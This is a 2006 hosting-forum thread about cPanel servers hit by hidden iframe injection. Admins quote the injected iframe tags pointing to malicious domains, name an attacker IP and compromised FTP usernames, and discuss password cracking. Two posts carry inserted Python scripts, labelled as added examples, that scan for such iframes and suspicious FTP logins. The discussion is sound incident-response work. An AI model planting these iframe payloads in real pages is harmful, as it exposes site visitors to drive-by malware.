The Community Forums


stelaartois.ru - cpanel server hacked ?

Discussion in 'Security' started by forlinuxsupport, Nov 30, 2006.

  1. forlinuxsupport

    Hi

    I have found this on one of my cPanel servers, and googling it has come up with 2 other servers it has happened on. One of the common things is they are all cPanel servers.

    I have inserted spaces in the words, in case someone clicks on it :)

    < I F R A M E name='StatPage' src='h t t p : / / s t e l a a r t o i s . r u /index2.php' w i d t h=5 h e i g h t=5
    s t y l e='display:none'></IFRAME>

    It seems to really slow the server down.. some type of DoS attack when running it?

    Anyone else had this issue? I'm busy investigating it, so I will post back here if I find anything.

    Just found out: on one server, changing the root password stopped them getting on. I looked in the logs and can't find anyone SSHing on.. hmm... puzzling.

    Regards
    Andy
     
  2. Kelmas

    That is an exploit that hit many HostGator servers some time ago, and that iframe contained a serious virus. I suggest backing up the /home/ dirs and reinstalling the servers.

    The problem is in PHP rendering (it automatically adds the iframe to all generated pages) and spreads due to an IE exploit. Other browsers do not show this.
     
  3. forlinuxsupport

    Hey guys

    I know the exploit you are talking about, and I ran the cPanel script and did the force update when that happened (about a month or so ago).

    So I'm puzzled as to how they are able to do it now...

    I'm hoping it's not a new cPanel exploit. Apache logs have rotated (nice one, cPanel) so I can't even look back in those.

    Regards
    Andy
     
  4. AndyReed

    Just in case, these are a few of the symptoms of a server that has been compromised:

    1. Applications that suddenly don't respond as expected.
    2. Additional user accounts that you can't account for (these may be made to look like system accounts).
    3. New files or directories with unusual names.
    4. Additional network traffic that can't be traced to a particular process
    5. E-Mail from a security department implying that your server has been port scanning or sending malicious network traffic
    6. Server running significantly slower

    If you are experiencing any of these symptoms, your server has been compromised and the best solution is an OS reload.
     
  5. AndyReed

    Is it cPanel exploit??? :rolleyes:
     
  6. JamesSmith

    Some of our servers are suffering the same fate, despite everything being up to date. Some web sites on some servers have the following added to their index.php pages:

    Code:
    <iframe src="http://isecurepages.net/out.php?s_id=11" width=0 height=0></iframe>
    
    I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don't think so), but they refuse to help, with the usual "we do not provide server management". What they don't seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!
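As an added example for this thread (not code from any of the posters, and not cPanel's), here is a Python script that walks a web root and reports hidden iframes of the two shapes quoted above: one styled display:none, and one with width=0 height=0. The sample files and the defanged URLs in them (hxxp, [.]) are constructed for the demo, following the first poster's habit of not making the link clickable; nothing is fetched. On a real box you would point scan_tree at /home and treat the output as a list of accounts to inspect, not as proof of how the injection got there.

```python
"""Walk a web root and report hidden iframes of the kind quoted in this thread.

Added example; not code from any poster or from cPanel. SAMPLE_FILES is
constructed for the demo and its URLs are deliberately defanged (hxxp, [.]).
"""
import os
import re
import tempfile

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w[\w-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

# Constructed sample web roots: two infected index pages (the two shapes quoted
# in this thread) and one clean page with a normal, visible embed.
SAMPLE_FILES = {
    "site_a/public_html/index.php": (
        "<?php echo 'hello'; ?>\n"
        "<IFRAME name='StatPage' src='hxxp://stelaartois[.]ru/index2.php' "
        "width=5 height=5 style='display:none'></IFRAME>\n"
    ),
    "site_b/public_html/index.php": (
        "<html><body>Welcome\n"
        '<iframe src="hxxp://isecurepages[.]net/out.php?s_id=11" width=0 height=0></iframe>\n'
        "</body></html>\n"
    ),
    "site_c/public_html/index.html": (
        '<iframe src="/embed/video.html" width="640" height="480"></iframe>\n'
    ),
}


def parse_attrs(tag):
    """Return {name: value} for the attributes of one HTML start tag."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
    return attrs


def _dim(value, default=10**6):
    """Numeric part of a width/height attribute; huge if absent or non-numeric."""
    digits = re.sub(r"\D", "", value)
    return int(digits) if digits else default


def is_hidden_iframe(tag, max_dim=10):
    """True if the iframe is styled invisible or is at most max_dim px square."""
    attrs = parse_attrs(tag)
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return _dim(attrs.get("width", "")) <= max_dim and _dim(attrs.get("height", "")) <= max_dim


def find_hidden_iframes(text):
    """Return the src of every hidden iframe found in a page's source."""
    return [parse_attrs(m.group(0)).get("src", "")
            for m in IFRAME_RE.finditer(text)
            if is_hidden_iframe(m.group(0))]


def scan_tree(root, suffixes=(".php", ".html", ".htm")):
    """Map relative path -> list of hidden iframe srcs for every hit under root."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(suffixes):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                srcs = find_hidden_iframes(fh.read())
            if srcs:
                hits[os.path.relpath(path, root)] = srcs
    return hits


def demo():
    """Write the constructed sample files to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_FILES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, srcs in sorted(demo().items()):
        print(f"{path}: {', '.join(srcs)}")
```

The size threshold (10 px) is a judgement call: the first iframe in this thread is 5x5 and the second 0x0, and a legitimate embed is rarely that small. Files are read as text with replacement for bad bytes so a single binary-looking file does not abort the whole sweep.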
     
  7. AndyReed

    Unless you can prove that your server was hacked because of their control panel, you don't have a case against them. It is in your best interest to take all measures to harden and secure your server. Remember that cPanel offers web hosting software that automates the intricate workings of web hosting servers. Compared to other control panels, cPanel is the most secure and robust control panel.
     
  8. Kelmas

    You can try searching for information on the HostGator forums; the guys there had a hard time, but solved a similar attack.
     
  9. JamesSmith

    I have no doubt that it was because of the recent cPanel exploit, as it's occurred and is occurring on a number of other hosts.

    It will be interesting to see how this progresses and if the impact of it is felt further; maybe when more people are affected someone will take notice.
     
  10. dfltech


    I was googling and found some links that had this problem as well..

    Now what concerned me was they all used cPanel servers and they were all affected in late November. So it is definitely not the last exploit.

    I hope that it is not the cPanel again..!!!
     
  11. Kelmas

    Actually late September.
     
  12. JamesSmith

    isecurepage code started to appear for us about a week before the cPanel exploit was announced by cPanel.

    I think we need some clarification from HostGator on whether their problem was the same, and on the line of code that was added to people's sites. If we can see a pattern, then there's still a problem that cPanel needs to do something about.

    The problem is, we don't know how this line of code is being added to sites.
     
  13. Kelmas

    As in HostGator's issue, these lines were added by the infected PHP engine during page rendering.
     
  14. forlinuxsupport

    yes.. got it :)

    They had guessed 3 users' FTP usernames and passwords on the server.

    Not sure how they would get those usernames.

    The IP he came from was 209.160.65.6

    The usernames were.. so not easy to guess:
    lookwhat
    paulslee
    yeschef

    I'm wondering if there is more to this.. and how they got those details...

    Might have exploited the server earlier and downloaded all usernames and passwords..

    Cheers
    Andy
     
  15. dfltech


    No, it's late November... and by the way, I have a friend whose site had the same iframe hack yesterday.. now he has a VPS with very few sites and cPanel.. but all other sites were intact.. So this should not have anything to do with cPanel, I suppose.

    Maybe a PHP application or a function...

    And regarding HostGator.. their issue was at the same time as cPanel had an exploit.. I have gone through their forums but did not find any recent complaints about the iframe hack.
     
    #15 dfltech, Dec 4, 2006
    Last edited by a moderator: Dec 5, 2006
  16. Kelmas

    I have an account at Hostgator and clearly know that iframe issue was IN SEPTEMBER.

    Now getting back to the topic... It is not difficult to steal FTP logins, as they are sent unencrypted. I can say very few use secure FTP.
     
  17. JamesSmith

    I don't think the passwords are being captured by anyone listening on the server, or between the server and user, or even on the user's system. It's more likely they gained the passwd file off the server and ran something like John the Ripper to crack the passwords.

    We've seen the same IP on all of our affected servers connect to the server with many different usernames and log in successfully. We're currently investigating if it's feasible to simply download the passwd file off the server with some PHP coding and then attempt to crack the passwords.
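The pattern described in posts 14 and 17, one source address logging in to account after account, is easy to pull out of the FTP log. As an added example (not any poster's code, and not cPanel's), the Python below does that over a handful of constructed log lines modelled on pure-ftpd's syslog output; the regexes assume that format and would need adjusting for proftpd or another daemon. The address 209.160.65.6 and the three usernames are the ones quoted in post 14; the other two addresses are documentation ranges, and the timestamps and host name are made up.

```python
"""Flag a source IP that logs in to many distinct FTP accounts.

Added example; not code from any poster or from cPanel. SAMPLE_LOG is
constructed for the demo, modelled on pure-ftpd syslog lines.
"""
import re
from collections import defaultdict

SAMPLE_LOG = """\
Dec  3 22:41:07 srv1 pure-ftpd: (?@209.160.65.6) [WARNING] Authentication failed for user [lookwhat]
Dec  3 22:41:09 srv1 pure-ftpd: (?@209.160.65.6) [INFO] lookwhat is now logged in
Dec  3 22:41:40 srv1 pure-ftpd: (?@209.160.65.6) [INFO] paulslee is now logged in
Dec  3 22:42:12 srv1 pure-ftpd: (?@209.160.65.6) [INFO] yeschef is now logged in
Dec  3 22:42:13 srv1 pure-ftpd: (?@209.160.65.6) [WARNING] Authentication failed for user [cheflady]
Dec  4 09:15:02 srv1 pure-ftpd: (?@198.51.100.23) [INFO] paulslee is now logged in
Dec  4 09:30:45 srv1 pure-ftpd: (?@203.0.113.9) [INFO] lookwhat is now logged in
"""

# Assumed pure-ftpd line shape: "<syslog ts> <host> pure-ftpd: (?@<ip>) [<level>] <msg>"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ pure-ftpd: "
    r"\(\S*@(?P<ip>[\d.]+)\) \[(?P<level>\w+)\] (?P<msg>.*)$"
)
LOGIN_RE = re.compile(r"^(?P<user>\S+) is now logged in$")
FAIL_RE = re.compile(r"^Authentication failed for user \[(?P<user>[^\]]*)\]$")


def summarize(lines):
    """Per source IP: the set of accounts it logged in to, and its failed attempts."""
    logins = defaultdict(set)
    failures = defaultdict(int)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, msg = m["ip"], m["msg"]
        ok = LOGIN_RE.match(msg)
        if ok:
            logins[ip].add(ok["user"])
        elif FAIL_RE.match(msg):
            failures[ip] += 1
    return logins, failures


def suspicious_sources(lines, min_accounts=3):
    """IPs that logged in to at least min_accounts distinct accounts."""
    logins, failures = summarize(lines)
    return {
        ip: {"accounts": sorted(users), "failed_attempts": failures[ip]}
        for ip, users in logins.items()
        if len(users) >= min_accounts
    }


def accounts_to_reset(lines, min_accounts=3):
    """Every account a suspicious IP got into: reset these passwords first."""
    report = suspicious_sources(lines, min_accounts)
    return sorted({u for entry in report.values() for u in entry["accounts"]})


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for ip, entry in suspicious_sources(lines).items():
        print(f"{ip}: {len(entry['accounts'])} accounts, "
              f"{entry['failed_attempts']} failures -> {', '.join(entry['accounts'])}")
    print("reset:", accounts_to_reset(lines))
```

A shared office or a reseller who manages many sites legitimately logs in to several accounts from one address, so the threshold is a starting point rather than a verdict; the failed-attempt count alongside it helps tell guessing (failures before each success) from someone who already had the credentials (clean logins only). Either way, the accounts returned are the ones to reset before anything else, and the rest of the password database is what a John the Ripper run, as suggested later in this thread, is for.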
     
  18. chirpy

    On most modern Linux distros passwords are not stored in /etc/passwd, they're in /etc/shadow, and to get at those you nearly always need a root exploit (unless your permissions on that file are FUBAR'd). I'd guess at a simple password guesser/weak password.

    Usually to capture passwords in the clear requires, again, either a root exploit on the server itself, or a packet sniffer on the same subnet as you on a separate server that has been root compromised. It's unlikely, but possible.
     
  19. JamesSmith

    On one server with 850 accounts, we believe 63 have been accessed and affected by this code change.

    So yes, it could be that all the users were using relatively weak passwords and they were guessed, along with the usernames ... or someone has been able to gain other sensitive information, as you suggest. But there is nothing sniffing on our network or the individual servers to do this. So it means cPanel has a problem, or something else gathered information before cPanel patched it.
     
  20. carluk

    Get John the Ripper to test your users' passwords.
     
    #20 carluk, Dec 5, 2006
    Last edited: Dec 6, 2006